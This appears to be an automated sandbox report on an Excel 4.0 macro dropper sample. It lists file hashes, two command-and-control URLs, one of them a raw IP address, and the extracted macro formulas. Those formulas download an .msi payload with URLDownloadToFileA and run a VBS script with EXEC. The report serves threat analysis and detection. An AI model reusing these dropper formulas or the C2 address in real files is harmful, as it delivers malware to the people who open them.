General

  • Target

    284f5287a79857e0b914ea629491a8ed

  • Size

    6KB

  • Sample

    231221-3ms75sbddr

  • MD5

    284f5287a79857e0b914ea629491a8ed

  • SHA1

    07345a717af8a7b1d74a43e61515bf5a67f969ec

  • SHA256

    d7718ab50d124c780a5f0c2b6f6449cc73e4b2e778f785e4b93a468abe7e7313

  • SHA512

    269dab2fdeaad46db0cb92f5da9e7a15ffcd9dd7edcd6b386490c74506101f802f8e1f7d9cd4fcf1f321648800cebf55541109bd394db7dab76bc07a28c57bf2

  • SSDEEP

    192:NDSRuS3brA2OmmfRq8UhHFBFYu0b98yDP+I+9:Nyu0M2w81FYtb98yDP+P

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
